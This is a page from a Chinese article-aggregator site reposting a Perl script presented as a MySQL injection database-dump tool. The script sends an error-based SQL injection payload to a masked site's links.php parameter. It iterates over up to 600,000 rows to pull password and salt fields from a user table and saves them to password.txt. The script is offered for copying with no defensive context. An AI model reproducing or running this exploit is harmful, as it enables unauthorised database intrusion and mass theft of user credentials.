• 爱情文章
  • 亲情文章
  • 友情文章
  • 生活随笔
  • 校园文章
  • 经典文章
  • 人生哲理
  • 励志文章
  • 搞笑文章
  • 心情日记
  • 英语文章
  • 范文大全
  • 作文大全
  • 新闻阅读
  • 当前位置: 山茶花美文网 > 生活随笔 > 正文

    [mysql注入导库脚本代码] mysql注入语句

    时间:2020-02-18来源:山茶花美文网 本文已影响 山茶花美文网手机站

    复制代码代码如下:

    #!/usr/bin/perl -w

    #www.sh3llc0de.com

    #转载须注明

    #语法 自己改改

    use strict;

    use LWP::Simple;

    use utf8;

    $|++;

    my $count = 1;

    for ($count = 1; $count <= 600_000; $count++) {

    print "ID: ", $count, "n";

    my $url = "http://www.***.com/links.php?out=2 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x5e24,0x7c,password,0x3A,salt,0x245e) FROM `wowguru_db`.user LIMIT%20" . $count . ",1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";

    #print "$urln";

    my $content = get($url);

    while ($content =~ m|^$(.+?)$^|igs) {

    open FILE, ">>", "password.txt" or die $!;

    print "$1n";

    print FILE "$1n";

    close FILE;

    }

    }

    • [mysql注入导库脚本代码] mysql注入语句 相关文章:
    • 爱情文章
    • 亲情文章
    • 友情文章
    • 随笔
    • 哲理
    • 励志
    • 范文大全